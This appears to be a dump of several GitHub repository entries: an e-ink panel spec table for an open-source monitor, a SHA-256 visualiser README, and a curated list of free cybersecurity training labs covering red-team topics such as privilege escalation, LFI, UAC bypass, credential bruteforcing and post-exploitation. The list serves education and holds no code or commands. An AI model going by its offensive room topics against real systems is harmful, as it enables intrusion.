| ED060XCG | VD1405-FOA | 320/400 | 1024x758 | Carta 1000 / 1200 | 40% | 17:1 | 2020 | TTL | | | |
| ED060XCH | VD1405-FOE | 400 | 1024x758 | Carta 1200 | | | | TTL | | | |
| ED060XD4 | | 320 | 1024x758 | Carta | | | | TTL | 34 | 34P-A | Yes |
| ED060XD6 | | | 1024x758 | | | | | TTL | 34 | 34P-A | |
| ED060XG1 | | V110/V220 | 1024x758 | Vizplex / Pearl | 40% | 12:1 | 2012 | TTL | | | |
| ED060XG2 | | V220 | 1024x758 | Pearl | | | | TTL | | | |
| ED060XG3 | | 320 | 1024x758 | Carta | | | | TTL | | | |
| ED060XH2 | | | 1024x758 | | | | | TTL | 34 | 34P-A | |
| ED060XH7 | | 320 | 1024x758 | Carta 1.2 | 45% | 17:1 | 2015 | TTL | | | |
| ED060XH9 | VB3300-FOG | 320 | 1024x758 | Carta | | | | TTL | | | |
| ED060TC1 | | 320 | 1448x1072 | Carta | | | | TTL | 35 | 35P-A | |
| ED060KC1 | | 320 | 1448x1072 | Carta | 46% | 17:1 | 2014 | TTL | 34 | 34P-A | |
| ED060KC4 | | 320 | 1448x1072 | Carta | | | | TTL | | | |
| ED060KD1 | | 320 | 1448x1072 | Carta | | | | TTL | 34 | 34P-A | Yes |
| ED060KG1 | | 320 | 1448x1072 | Carta | 47% | 17:1 | 2015 | TTL | 34 | 34P-A | |
| ED060KH4 | | 320 | 1448x1072 | Carta | | | | TTL | | | |
| ED060KH6 | VB3300-FOE | 320 | 1448x1072 | Carta | | | | TTL | | | |
| ED060KHC | | | 1448x1072 | | | | | TTL | | | |
| ED060KHE | VD1405-FOH | | 1448x1072 | Carta 1300 | | | | TTL | 34 | 34P-A | |
| EC060KH3 | SA1452-FOA | | 1448x1072 | Kaleido | | | | TTL | | | |
| EC060KH5 | SC1452-FOD | | 1448x1072 | Kaleido 3 | | | | TTL | 34 | 34P-A | |
| ED061KC1 | VD1405-FAA | 400 | 1648x824 | Carta 1200 | | | | TTL | | | |
| ED067KC1 | VB3300-FGA | 320 | 1800x900 | Carta | 45% | 16:1 | 2020 | TTL | 50 | 50P-B | |
| EC067KC1 | SA1452-FGA | | 1800x900 | Kaleido | | | | TTL | 50 | 50P-B | |
| ED068TG1 | | 320 | 1440x1080 | Carta | | | <2013 | TTL | | | |
| ED068TH1 | | 320 | 1440x1080 | Carta | | | <2014 | TTL | | | |
| ED068TH3 | VB3300-FHA | 320 | 1440x1080 | Carta | | | | TTL | | | |
| ED068KC1 | | 400SU | 1648x1236 | Carta 1200 | | | | TTL | 40 | | |
| ED068KC3 | VD1405-FHD | 400 | 1648x1236 | Carta 1200 | | | | TTL | 40 | | |
| ED068KC5 | VD1405-FHF | 400 | 1648x1236 | Carta 1200 | \>44% | \>19:1 | | TTL | 40 | | |
| ED070KC2 | | 320 | 1680x1264 | Carta 1100 | \>47% | \>16:1 | | TTL | | | |
| ED070KC3 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | |
| ED070KC4 | VD1400-GOC | 400 | 1680x1264 | Carta 1200 | | | | TTL | | | |
| ED070KH1 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | |
| EC070KH1 | SC1452-GOA | | 1680x1264 | Kaleido Plus | | | | TTL | | | |
| LB071WS1 | | | 1024x600 | | | 7:1 | | TTL | | | |
| ET073TC1 | | V320 | 750x200 | Carta | | | 2016 | TTL | | | |
| ED078KC1 | | | 1872x1404 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 40 | 40P-A | |
| ED078KC2 | VB3300-GHC | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | |
| ED078KH1 | | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | |
| ED078KH3 | | 320 | 1872x1404 | Carta 1.2 | | | | TTL | 40 | 40P-A | |
| ED078KH4 | VB3300-GHB | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | |
| EC078KH3 | SC1452-GHA | | 1872x1404 | Kaleido Plus | | | | TTL | 40 | 40P-A | |
| EC078KH4 | SC1452-GHB | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | |
| EC078KH5 | SC1452-GHC | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | |
| EC078KH6 | SC1452-GHD | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | |
| EC078KH7 | SC1452-GHE | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | |
| ED080XC1 | | V110 | 1024x768 | Vizplex | | | | TTL | | | |
| ED080TC1 | | V220 | 1600x1200 | Pearl | | | | TTL | | | |
| EC080SC2 | | V250 | 600xRGBx800 | Triton 2 | | | | TTL | 40 | 40P-A | Yes |
| ES080KC2 | VD1400-HOB | 400 | 1920x1440 | Carta 1200 | | | | TTL | | | |
| ES080KH1 | | | | | | | | | | | |
| AC080KH1 | AD1004-HOA | HAL3 | 1920x1440 | Gallery 3 | | | | MiniLVDS | | | |
| ED097OC1 | | V110A | 1200x825 | Vizplex | 35% | 7:1 | 2008 | TTL | 33 | 33P-A | |
| ED097OC4 | | V110A/V220 | 1200x825 | Vizplex / Pearl | | | | TTL | 33 | 33P-A | |
| ED097OD2 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | |
| ED097TC1 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | |
| ED097TC2 | VB3300-JGA | 320 | 1200x825 | Carta 1.2 | 42% | 16:1 | 2016 | TTL | 33 | 33P-A | |
| EL097TR2 | EA2220-JGB | | 1200x825 | Spectra 3000 | | | | TTL | | | |
| ED100UC1 | VB3300-KOA | 320 | 1600x1200 | Carta | 45% | 16:1 | 2020 | TTL | 40 | DIRECT | |
| ES103TC1 | VB3300-KCA | 320 | 1872x1404 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 40 | DIRECT | |
| ED103TC2 | VB3300-KCD | 320 | 1872x1404 | Carta | 43% | 14:1 | 2019 | TTL | 40 | DIRECT | |
| ES103TD1 | | 320 | 1872x1404 | Carta | | | | TTL | | | |
| ES103TD3 | | 320 | 1872x1404 | Carta | | | | TTL | | | |
| EC103TD1 | SA1452-KCC | | 1872x1404 | Kaleido | | | | TTL | | | |
| EC103TH2 | SC1452-KCB | | 1872x1404 | Kaleido Plus | | | | TTL | | | |
| EC103KH2 | SC1452-KCD | | 2480x1860 | Kaleido 3 | | | | TTL | | | |
| ES107KC1 | VD1400-KGA | 400 | 2560x1920 | Carta 1200 | | | | TTL | | | |
| ES108FC1 | | 320 | 1920x1080 | Carta | 46% | 16:1 | 2017 | TTL | 50 | 50P-C | |
| ES108FC2 | | 320 | 1920x1080 | Carta | | | | TTL | | | |
| ED113TC1 | VB3300-LCA | 320 | 2400x1034 | Carta | 35% | 12:1 | 2017 | TTL | 50 | 50P-A | |
| ED113TC2 | VB3300-LCB | 320 | 2400x1034 | Carta 1.2 | 35% | 12:1 | 2019 | TTL | 50 | 50P-A | |
| EC113TC1 | SC1452-LCA | | 2400x1034 | Kaleido Plus ? | | | | TTL | 50 | 50P-A | |
| ED115OC1 | | V220 | 2760x2070 | Pearl | 35% | 12:1 | 2012 | TTL | 40 | DIRECT | |
| AC118TC1 | AD1004-LHA | | | Gallery 3 | | | | MiniLVDS | | | |
| ES120MC1 | VD1400-MOA | 400 | 2560x1600 | Carta 1200 | | | | TTL | 40 | | |
| ES133UT1 | | V220 | 1600x1200 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-A | Yes |
| ES133UT2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | Yes |
| ES133UE2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | |
| ED133UT2 | VB3300-NCB | 320 | 1600x1200 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 39 | 39P-A | |
| ED133UT3 | VB3300-NCC | 320 | 1600x1200 | Carta | 45% | 16:1 | 2019 | TTL | 39 | 39P-A | |
| ES133TT3 | | 320 | 2200x1650 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 39 | | |
| ES133TT5 | VH1948-NCC | 450 | 2200x1650 | Carta 1250 | | | | TTL | 39 | | |
| EC133UJ1 | SD1452-NCB | | 1600x1200 | Kaleido 3 Outdoor | | | | TTL | 39 | 39P-A | |
| AC133UT1 | AA1020-NCA | | 1600x1200 | Gallery / Gallery 4000 | 35% | 10:1 | 2020 | TTL | 39 | 39P-A | |
| EL133US1 | | | 1600x1200 | Spectra 3000 | | | | TTL | 39 | 39P-A | Yes |
| EL133UR1 | EA2220-NCC | | 1600x1200 | Spectra 3000 | 33% | 15:1 | 2020 | TTL | 39 | 39P-A | |
| EL133UF1 | ED2208-NCA | | 1600x1200 | Spectra 6 | | | | QSPI | | | |
| ED140TT1 | VB3300-IDA | 320 | 1440x300 | Carta | | | | TTL | | | |
| AC253TT1 | AA1020-PEA | | 3200x1800 | Gallery Plus / Gallery 4000 | 35% | 10:1 | 2020 | MiniLVDS | 51x2 | | |
| EL253EW1 | ED2208-PEA | | 3200x1800 | Spectra 6 | | | | MiniLVDS | | | |
| EC253TT1 | SD1452-PEA | | 3200x1800 | Kaleido 3 Outdoor | | | | MiniLVDS | | | |
| ED253TT1 | VB3300-PEA | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | |
| ED253TT2 | VB3300-PEB | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | |
| ED253TT3 | VB3300-PEC | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | |
| EL253TV1 | EB2200-PEA | | 3200x1800 | Spectra 3100 | | | | MiniLVDS | 51x2 | | |
| ED280TT1 | VB3300-PHA | 320 | 3840x1080 | Carta 1.2 | 40% | 12:1 | 2020 | MiniLVDS | 51x2 | | |
| ED312TT2 | VA3200-QAA | V220 | 2560x1440 | Pearl | | | | TTL | 50x4 | | |
| ED312TT3 | VA3200-QAB | V220 | 2560x1440 | Pearl | 40% | 12:1 | 2018 | TTL | 50x4 | | |
| EC312TT2 | SB1452-QAA | V220 | 2560x1440 | Triton | | | | TTL | 50x4 | | |
| EL315TW1 | ED2208-QBA | | 2560x1440 | Spectra 6 | | | | QSPI | | | |
| ED420TT1 | | V220 | 2880x2160 | Pearl | | | | TTL | 50x2 | | |
| ED420TT3 | VB3300-RBA | 320 | 2880x2160 | Carta 1.2 | 45% | 16:1 | 2020 | TTL | 50x2 | | |
| ED420TT5 | VB3300-RBB | 320 | 2880x2160 | Carta 1.2 | | | | TTL | 50x2 | | |
Note: Carta 1.2 is also known as Carta 1000. If the table cell says Carta it also likely means Carta 1000 (could be 1100 as well, I don't know for sure). | Open-source E-ink monitor. Mirror of https://gitlab.com/zephray/glider | null | 0 | 4 | 3 | 53 | 0 | 3 | 0 |
GriffinJohnston/ldrs | null | Modern, tree-shakeable loader & spinner web components. Made with CSS, HTML and SVG. https://uiball.com/ldrs | null | 0 | 2 | 2 | 100 | 3 | 1 | 0 |
dmarman/sha256algorithm |
![This is an image](./public/sha256.png)
# Sha256algorithm
Sha256 algorithm explained online step by step visually [sha256algorithm.com](https://sha256algorithm.com/)
This website will help you understand how a sha256 hash is calculated from start to finish.
I hope this will be helpful for students learning about hash functions and sha256.
The code it's quite messy and probably there are some parts that don't follow the react way.
Ask me anything at [@manceraio](https://twitter.com/manceraio)
## Install
I built this using create-react-app. If you want to play with it, just install javascript dependencies:
`npm install`
and start local server:
`npm start`
| Sha256 Algorithm Explained | null | 0 | 6 | 6 | 30 | 5 | 1 | 0 |
brootware/awesome-cyber-security-university | # Awesome Cyber Security University [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
> A curated list of awesome and free educational resources that focuses on learn by doing.
<div align="center">
<a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="assets/purpleteam.png" width="250"/></a>
<br/>
<i>Because education should be free.</i>
<br/>
<a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="https://visitor-badge.glitch.me/badge?page_id=brootware.cyber-security-university&right_color=blue" /></a>
</div>
## Contents
* [About](#about)
* [Introduction and Pre-Security](#introduction-and-pre-security) - (Completed/In Progress)
* [Free Beginner Red Team Path](#free-beginner-red-team-path) - (Add your badge here. The badge code is hidden in this repo)
* [Free Beginner Blue Team Path](#free-beginner-blue-team-path) - (Add your badge here. The badge code is hidden in this repo)
* [Bonus CTF practice and Latest CVEs](#bonus-ctf-practice-and-latest-cves) - (Completed/In Progress)
* [Bonus Windows](#bonus-windows) - (Completed/In Progress)
* [Extremely Hard Rooms to do](#extremely-hard-rooms-to-do) - (Completed/In Progress)
<!-- | Paths | Completion |
| -------------------------------- | ---------------------|
|[Introduction and Pre-Security](#-introduction-and-pre-security) |(Completed/In Progress) |
|[Free Beginner Red Team Path](#-free-beginner-red-team-path) |(Add your badge here. Badge code is hidden in this repo) |
|[Free Beginner Blue Team Path](#-free-beginner-blue-team-path) |(Add your badge here. Badge code is hidden in this repo) |
|[Bonus CTF practice & Latest CVEs](#-bonus-ctf-practice-and-latest-cves)|(Completed/In Progress)|
|[Bonus Windows](#-bonus-windows)|(Completed/In Progress)|
|[Extremely Hard Rooms to do](#-extremely-hard-rooms-to-do) |(Completed/In Progress) | -->
## About
Cyber Security University is A curated list of awesome and free educational resources that focus on learning by doing.
There are 6 parts to this.
1. Introduction and Pre-security
2. Free Beginner Red Team Path
3. Free Beginner Blue Team Path
4. Bonus practices
5. Latest CVEs
6. Extremely Hard rooms
The tasks are linear in nature of the difficulty. So it's recommended to do it in order. But you can still jump around and skip some rooms If you find that you are already familiar with the concepts.
<!--lint disable double-link-->
As you go through the curriculum, you will find completion badges that are hidden within this [`README.md`](https://github.com/brootware/Cyber-Security-University/blob/main/README.md) for both red and blue team path completion badges. You can copy the HTML code for them and add it to the content page below once you have completed them.
<!--lint disable double-link-->
[↑](#contents)
<!--lint enable double-link-->
## Contributing
Pull requests are welcome with the condition that the resource should be free! Please read the [contribution guide in the wiki](https://github.com/brootware/Cyber-Security-University/wiki) if you wish to add tools or resources.
## Introduction and Pre-Security
### Level 1 - Intro
<!--lint disable double-link-->
* [OpenVPN](<https://tryhackme.com/room/openvpn>) - Learn how to connect to a virtual private network using OpenVPN.<!--lint enable double-link-->
* [Welcome](<https://tryhackme.com/jr/welcome>) - Learn how to use a TryHackMe room to start your upskilling in cyber security.
* [Intro to Researching](<https://tryhackme.com/room/introtoresearch>) - A brief introduction to research skills for pentesting.
* [Linux Fundamentals 1](<https://tryhackme.com/room/linuxfundamentalspart1>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
* [Linux Fundamentals 2](<https://tryhackme.com/room/linuxfundamentalspart2>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
* [Linux Fundamentals 3](<https://tryhackme.com/room/linuxfundamentalspart3>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal.
* [Pentesting fundamentals](<https://tryhackme.com/room/pentestingfundamentals>) - Fundamentals of penetration testing.
* [Principles of security](<https://tryhackme.com/room/principlesofsecurity>) - Principles of security.
* [Red Team Engagements](<https://tryhackme.com/room/redteamengagements>) - Intro to red team engagements.
* [Hip Flask](https://tryhackme.com/room/hipflask) - An in-depth walkthrough covering pentest methodology against a vulnerable server.
<!-- markdownlint-disable MD036 -->
**Introductory CTFs to get your feet wet**<!-- markdownlint-enable MD036 -->
* [Google Dorking](<https://tryhackme.com/room/googledorking>) - Explaining how Search Engines work and leveraging them into finding hidden content!
* [Osint](<https://tryhackme.com/room/ohsint>) - Intro to Open Source Intelligence.
* [Shodan.io](<https://tryhackme.com/room/shodan>) - Learn about Shodan.io and how to use it for device enumeration.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Free Beginner Red Team Path
### Level 2 - Tooling
* [Tmux](<https://tryhackme.com/room/rptmux>) - Learn to use tmux, one of the most powerful multi-tasking tools on linux.
* [Nmap,Curl and Netcat](<https://echoctf.red/challenge/1>) - Get experience with Nmap, Curl and Netcat for network communications.
* [Web Scanning](<https://tryhackme.com/room/rustscan>) - Learn the basics of automated web scanning.
* [Sublist3r](<https://tryhackme.com/room/rpsublist3r>) - Learn how to find subdomains with Sublist3r.
* [Metasploit](<https://tryhackme.com/room/metasploitintro>) - An introduction to the main components of the Metasploit Framework.
* [Hydra](<https://tryhackme.com/room/hydra>) - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials.
* [Linux Privesc](<https://tryhackme.com/room/linuxprivesc>) - Practice your Linux Privilege Escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available.
* [Red Team Fundamentals](<https://tryhackme.com/room/redteamfundamentals>) - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements.
* [Red Team Recon](<https://tryhackme.com/room/redteamrecon>) - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target.
<!-- markdownlint-disable MD036 -->
**Red Team Intro CTFs**<!-- markdownlint-enable MD036 -->
* [Vulnversity](<https://tryhackme.com/room/vulnversity>) - Learn about active recon, web app attacks and privilege escalation.
* [Blue](<https://tryhackme.com/room/blue>) - Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
* [Simple CTF](<https://tryhackme.com/room/easyctf>) - Beginner level CTF.
* [Bounty Hacker](<https://tryhackme.com/room/cowboyhacker>) - A space cowboy-themed boot to root machine.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 3 - Crypto & Hashes with CTF practice
* [Crack the hash](<https://tryhackme.com/room/crackthehash>) - Cracking hash challenges.
* [Agent Sudo](<https://tryhackme.com/room/agentsudoctf>) - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
* [The Cod Caper](<https://tryhackme.com/room/thecodcaper>) - A guided room taking you through infiltrating and exploiting a Linux system.
* [Ice](<https://tryhackme.com/room/ice>) - Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
* [Lazy Admin](<https://tryhackme.com/room/lazyadmin>) - Easy linux machine to practice your skills.
* [Basic Pentesting](<https://tryhackme.com/room/basicpentestingjt>) - This is a machine that allows you to practice web app hacking and privilege escalation.
* [Bypassing UAC](https://tryhackme.com/room/bypassinguac) - Learn common ways to bypass User Account Control (UAC) in Windows hosts.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 4 - Web
* [OWASP top 10](<https://tryhackme.com/room/owasptop10>) - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
* [Inclusion](<https://tryhackme.com/room/inclusion>) - A beginner-level LFI challenge.
* [Injection](<https://tryhackme.com/room/injection>) - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers.
* [Juiceshop](<https://tryhackme.com/room/owaspjuiceshop>) - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities.
* [Overpass](<https://tryhackme.com/room/overpass>) - What happens when some broke CompSci students make a password manager.
* [Year of the Rabbit](<https://tryhackme.com/room/yearoftherabbit>) - Can you hack into the Year of the Rabbit box without falling down a hole.
* [DevelPy](<https://tryhackme.com/room/bsidesgtdevelpy>) - Boot2root machine for FIT and bsides Guatemala CTF.
* [Jack of all trades](<https://tryhackme.com/room/jackofalltrades>) - Boot-to-root originally designed for Securi-Tay 2020.
* [Bolt](https://tryhackme.com/room/bolt) - Bolt themed machine to root into.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 5 - Reverse Engineering & Pwn
* [Intro to x86 64](<https://tryhackme.com/room/introtox8664>) - This room teaches the basics of x86-64 assembly language.
* [CC Ghidra](<https://tryhackme.com/room/ccghidra>) - This room teaches the basics of ghidra.
* [CC Radare2](<https://tryhackme.com/room/ccradare2>) - This room teaches the basics of radare2.
* [Reverse Engineering](<https://tryhackme.com/room/reverseengineering>) - This room focuses on teaching the basics of assembly through reverse engineering.
* [Reversing ELF](<https://tryhackme.com/room/reverselfiles>) - Room for beginner Reverse Engineering CTF players.
* [Dumping Router Firmware](<https://tryhackme.com/room/rfirmware>) - Reverse engineering router firmware.
* [Intro to pwntools](<https://tryhackme.com/room/introtopwntools>) - Introduction to popular pwn tools framework.
* [Pwnkit: CVE-2021-4034](<https://tryhackme.com/room/pwnkit>) - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 6 - PrivEsc
* [Sudo Security Bypass](<https://tryhackme.com/room/sudovulnsbypass>) - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series.
* [Sudo Buffer Overflow](<https://tryhackme.com/room/sudovulnsbof>) - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series.
* [Windows Privesc Arena](<https://tryhackme.com/room/windowsprivescarena>) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM.
* [Linux Privesc Arena](<https://tryhackme.com/room/linuxprivescarena>) - Students will learn how to escalate privileges using a very vulnerable Linux VM.
* [Windows Privesc](<https://tryhackme.com/room/windows10privesc>) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM.
* [Blaster](<https://tryhackme.com/room/blaster>) - Metasploit Framework to get a foothold.
* [Ignite](<https://tryhackme.com/room/ignite>) - A new start-up has a few security issues with its web server.
* [Kenobi](<https://tryhackme.com/room/kenobi>) - Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
* [Capture the flag](<https://tryhackme.com/room/c4ptur3th3fl4g>) - Another beginner-level CTF challenge.
* [Pickle Rick](<https://tryhackme.com/room/picklerick>) - Rick and Morty themed LFI challenge.
> Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs.
<details>
<summary>Click here to get your red team badge!</summary>
<https://gist.github.com/brootware/e30a10dbccf334eb95da7ea59d6f87fe>
</details>
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Free Beginner Blue Team Path
### Level 1 - Tools
* [Introduction to digital forensics](https://tryhackme.com/room/introdigitalforensics) - Intro to Digital Forensics.
* [Windows Fundamentals](<https://tryhackme.com/room/windowsfundamentals1xbx>) - Intro to Windows.
* [Nessus](<https://tryhackme.com/room/rpnessusredux>) - Intro to nessus scan.
* [Mitre](<https://tryhackme.com/room/mitre>) - Intro to Mitre attack framework.
* [IntroSIEM](https://tryhackme.com/room/introtosiem) - Introduction to SIEM.
* [Yara](<https://tryhackme.com/room/yara>) - Intro to yara for malware analysis.
* [OpenVAS](<https://tryhackme.com/room/openvas>) - Intro to openvas.
* [Intro to Honeypots](<https://tryhackme.com/room/introductiontohoneypots>) - Intro to honeypots.
* [Volatility](<https://cyberdefenders.org/blueteam-ctf-challenges/redline/>) - Intro to memory analysis with volatility.
* [Red Line](<https://tryhackme.com/room/btredlinejoxr3d>) - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint.
* [Autopsy](<https://tryhackme.com/room/autopsy2ze0>) - Use Autopsy to investigate artifacts from a disk image.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 2 - Security Operations, Incident Response & Threat Hunting
* [Investigating Windows](<https://tryhackme.com/room/investigatingwindows>) - Investigating Windows.
* [Juicy Details](<https://tryhackme.com/room/juicydetails>) - A popular juice shop has been breached! Analyze the logs to see what had happened.
* [Carnage](<https://tryhackme.com/room/c2carnage>) - Apply your analytical skills to analyze the malicious network traffic using Wireshark.
* [Squid Game](<https://tryhackme.com/room/squidgameroom>) - Squid game-themed CTF.
* [Splunk Boss of the SOC V1](<https://tryhackme.com/room/bpsplunk>) - Part of the Blue Primer series, learn how to use Splunk to search through massive amounts of information.
* [Splunk Boss of the SOC V2](<https://cyberdefenders.org/blueteam-ctf-challenges/16>) - Splunk analysis vol 2.
* [Splunk Boss of the SOC V3](<https://cyberdefenders.org/blueteam-ctf-challenges/8>) - Splunk analysis vol 3.
* [Hunt Conti with Splunk](https://tryhackme.com/room/contiransomwarehgh) - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server.
* [Hunting for Execution Tactic](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-3) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Execution (TA0002).
* [Hunting for Credential Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-5) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Credential Access (TA0006).
* [Hunting for Persistence Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-2) - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003).
* [Hunting for Defense Evation](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-4) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Defense Evasion (TA0005).
<!--lint disable double-link-->
[↑](#contents)
<!--lint enable double-link-->
### Level 3 - Beginner Forensics, Threat Intel & Cryptography
* [Martryohka doll](<https://play.picoctf.org/practice/challenge/129?category=4&page=1&solved=0>) - Beginner file analysis challenge.
* [The Glory of the Garden](<https://play.picoctf.org/practice/challenge/44?category=4&page=1&solved=0>) - Beginner image analysis challenge.
* [Packets Primer](<https://play.picoctf.org/practice/challenge/286?category=4&page=2&solved=0>) - Beginner packet analysis challenge.
* [Wireshark doo doo doo](<https://play.picoctf.org/practice/challenge/115?category=4&page=1&solved=0>) - Beginner packet analysis challenge.
* [Wireshark two two two](<https://play.picoctf.org/practice/challenge/110?category=4&page=1&solved=0>) - Beginner packet analysis challenge.
* [Trivial flag transfer protocol](<https://play.picoctf.org/practice/challenge/103?category=4&page=1&solved=0>) - Beginner packet analysis challenge.
* [What Lies within](<https://play.picoctf.org/practice/challenge/74?category=4&page=2&solved=0>) - Beginner decoding analysis challenge.
* [Illumination](<https://app.hackthebox.com/challenges/illumination>) - Medium level forensics challenge.
* [Emo](<https://app.hackthebox.com/challenges/emo>) - Medium level forensics challenge.
* [Obsecure](<https://app.hackthebox.com/challenges/obscure>) - Medium level forensics challenge.
* [Intel101 Challenge](<https://cyberdefenders.org/blueteam-ctf-challenges/38>) - Medium level Threat Intel challenge.
* [Introduction to Cryptohack](<https://cryptohack.org/courses/intro/course_details/>) - Medium level cryptography challenge.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 4 - Memory & Disk Forensics
* [Sleuthkit Intro](<https://play.picoctf.org/practice/challenge/301?category=4&page=2&solved=0>) - Medium level disk forensics challenge.
* [Reminiscent](<https://app.hackthebox.com/challenges/reminiscent>) - Medium level disk forensics challenge.
* [Hunter - Windows Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/32>) - Medium level disk forensics challenge.
* [Spotlight - Mac Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/34>) - Medium level disk forensics challenge.
* [Ulysses - Linux Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/41>) - Medium level disk forensics challenge.
* [Banking Troubles - Windows Memory Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/43>) - Medium level memory forensics challenge.
* [Detect Log4J](<https://cyberdefenders.org/blueteam-ctf-challenges/86>) - Medium level disk forensics challenge.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
### Level 5 - Malware and Reverse Engineering
* [History of Malware](<https://tryhackme.com/room/historyofmalware>) - Intro to malware history.
* [Malware Introduction](<https://tryhackme.com/room/malmalintroductory>) - Intro to malware.
* [Basic Malware Reverse Engineering](<https://tryhackme.com/room/basicmalwarere>) - Intro to malware RE.
* [Intro Windows Reversing](<https://tryhackme.com/room/windowsreversingintro>) - Intro to Windows RE.
* [Windows x64 Assembly](<https://tryhackme.com/room/win64assembly>) - Introduction to x64 Assembly on Windows.
* [JVM reverse engineering](<https://tryhackme.com/room/jvmreverseengineering>) - Learn Reverse Engineering for Java Virtual Machine bytecode.
* [Get PDF (Malicious Document)](<https://cyberdefenders.org/blueteam-ctf-challenges/47>) - Reversing PDF malware.
> Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs.
<details>
<summary>Click here to get your blue team badge!</summary>
<https://gist.github.com/brootware/62b76a84aaa8d6f55c82f6f329ad6d2d>
</details>
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Bonus CTF practice and Latest CVEs
* [Bandit](<https://overthewire.org/wargames/bandit/>) - Aimed at absolute beginners and teaches the basics of remote server access.
* [Natas](<https://overthewire.org/wargames/natas/>) - Teaches the basics of serverside web-security.
* [Post Exploitation Basics](<https://tryhackme.com/room/postexploit>) - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom.
* [Smag Grotto](<https://tryhackme.com/room/smaggrotto>) - An obsecure boot to root machine.
* [Dogcat](<https://tryhackme.com/room/dogcat>) - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.
* [Buffer Overflow Prep](<https://tryhackme.com/room/bufferoverflowprep>) - Practice stack-based buffer overflows.
* [Break out the cage](<https://tryhackme.com/room/breakoutthecage1>) - Help Cage bring back his acting career and investigate the nefarious going on of his agent.
* [Lian Yu](<https://tryhackme.com/room/lianyu>) - A beginner-level security challenge.
* [Insecure Kubernetes](<https://tryhackme.com/room/insekube>) - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability.
* [The Great Escape (docker)](<https://tryhackme.com/room/thegreatescape>) - Escaping docker container.
